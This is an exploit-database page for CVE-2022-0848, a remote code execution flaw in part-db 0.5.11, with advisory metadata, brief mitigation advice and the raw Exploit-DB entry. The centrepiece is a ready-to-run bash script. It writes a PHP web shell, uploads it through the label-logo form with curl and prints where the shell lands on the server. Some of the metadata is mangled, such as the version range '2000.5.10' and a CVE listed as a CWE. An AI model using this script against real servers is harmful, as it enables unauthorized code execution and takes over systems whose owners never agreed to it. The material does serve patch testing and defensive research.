part-db 0.5.11 - Remote Code Execution (RCE)

vendor:

part-db

by:

Sunny Mehra

9.8

CVSS

CRITICAL

Remote Code Execution (RCE)

CWE

Product Name: part-db

Affected Version From: 2000.5.10

Affected Version To: 2000.5.11

Patch Exists: YES

Related CWE: CVE-2022-0848

CPE: part-db/part-db

Metasploit:

Other Scripts:

Platforms Tested: KALI OS

2022

part-db 0.5.11 – Remote Code Execution (RCE)

part-db 0.5.11 is vulnerable to Remote Code Execution (RCE) due to improper input validation. An attacker can craft a malicious payload and upload it to the vulnerable application, which can be used to execute arbitrary code on the server. This vulnerability is identified as CVE-2022-0848.

Mitigation:

Input validation should be properly implemented to prevent malicious payloads from being uploaded to the application. Additionally, the application should be configured to run with the least privileges necessary.

Source

Exploit-DB raw data:

# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Google Dork: NA
# Date: 03/04/2022
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.] 
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
#
---------------

#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host 
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra
echo "<?php system(id); ?>">POC.phtml  #PHP Shell Code
result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"